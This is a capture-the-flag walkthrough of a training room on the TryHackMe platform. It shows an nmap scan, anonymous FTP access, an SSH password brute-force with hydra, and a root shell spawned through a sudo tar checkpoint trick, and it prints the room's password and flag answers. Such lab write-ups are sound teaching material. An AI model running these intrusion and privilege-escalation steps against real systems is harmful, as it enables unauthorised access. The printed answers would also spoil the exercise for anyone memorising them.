TryHackMe | Bounty Hacker writeup
This is one (of many) walkthrough for the Bounty Hacker CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article.
Enumeration
As usual, I use nmap to see which ports are open.
nmap -sC -SV $IP-ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-11 16:34 GMT
Nmap scan report for ip-10-10-70-0.eu-west-1.compute.internal (10.10.70.0)
Host is up (0.00062s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.211.115
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 02:59:29:91:C0:FF (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.73 secondsFor this command, you notice ftp as an exposed service. Additionally, from the basic vulnerabilities script flag, you notice the Anonymous login open. Wow! You can now access ftp server.
$ ftp 10.10.70.0
Connected to 10.10.70.0.
220 (vsFTPd 3.0.3)
Name (10.10.70.0:root): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 07 2020 .
drwxr-xr-x 2 ftp ftp 4096 Jun 07 2020 ..
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
ftp> get locks.txtYou quickly notice two txt files. You can download them with the get command. Later on that day, I quickly searched for a “get all ftp files at once command” and quickly found out that mget do the trick. One of the files allowed me to answer the first question.
- Who wrote the task list? lin
The locks.txt, however, didn’t answer the second question directly. That file seemed like a list of passwords used in something. I tried to use the locks.txt file with hydra.
2. What service can you bruteforce with the text file found? ssh
$ hydra -l lin -P locks.txt -vV $IP_ADDRESS ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
...
[22][ssh] host: 10.10.70.0 login: lin password: RedDr4gonSynd1cat3
[STATUS] attack finished for $IP_ADDRESS (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2023-01-11 16:50:123. What is the users password? RedDr4gonSynd1cat3
Having all elements available, we can now access the server through ssh.
ssh lin@$P_ADDRESS
The authenticity of host '$IP_ADDRESS' can't be established.
lin@10.10.70.0's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
lin@bountyhacker:~/Desktop$4. user.txt THM{CR1M3_SyNd1C4T3}
Privilege escalation
The remaining of the CTF introduced some new challenges. The very first thing to do was to list the commands I was allowed to execute on behalf of lin.
lin@bountyhacker:~$ sudo -l
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tarFrom gtfo you have an entry to spawn a shell as root. The prize is on the previous forbidden folder in /root.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh5. root.txt THM{80UN7Y_h4cK3r}
Conclusion
Surprisingly, this CTF was pretty smooth! Going through several THM modules and learning lots of techniques from it, allowed me to be prepared to face and solve this exercise. Kudos to sevuhl to create this one! 👍
